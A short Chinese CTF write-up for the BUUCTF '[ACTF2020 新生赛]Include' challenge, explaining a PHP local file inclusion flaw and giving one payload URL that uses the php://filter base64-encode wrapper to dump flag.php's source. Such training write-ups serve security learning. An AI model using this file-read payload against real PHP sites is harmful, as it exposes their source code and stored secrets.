web:[ACTF2020 新生赛]Include

前提知识

文件包含漏洞

php伪协议

题目

点开题目,页面只显示一个tips,点进去看看

点进去之后

没有别的提示,先看源代码,恩,什么都没有

再看一下点进tips显示的页面,发现url中

flag可能就藏在这个页面中,但是被隐藏了看不见

题目名为include,可以联想到文件包含漏洞

构造payload

复制代码
http://83e3f0ce-775a-4dc5-b714-d5d5bfc15cd8.node4.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php

显示为

base64解码得,即得到flag

总结

提示信息也要包括题目名

相关推荐
一口一个橘子2 小时前
[ctfshow web入门]web99 in_array的弱比较漏洞
web安全·网络安全·php
波吉爱睡觉3 小时前
Redis反弹Shell
redis·web安全·网络安全
wha the fuck4044 小时前
攻防世界-引导-Web_php_unserialize
安全·web安全·网络安全·php
烟斗与演绎9 小时前
综合实验(4)
网络·网络安全·智能路由器
吃不得辣条10 小时前
网络安全笔记
笔记·web安全·智能路由器
m0_7472660918 小时前
代码审计与web安全选择题1
网络安全
编程到天明1 天前
CTF-Web题解:“require_once(‘flag.php‘); &assert(“$i == $u“);”
网络安全·php
Johny_Zhao1 天前
CentOS Stream 9上部署FTP应用服务的两种方法(传统安装和docker-compose)
linux·网络安全·信息安全·kubernetes·云计算·containerd·ftp·yum源·系统运维
还是奇怪1 天前
深入解析三大Web安全威胁:文件上传漏洞、SQL注入漏洞与WebShell
sql·安全·web安全
终焉暴龙王2 天前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php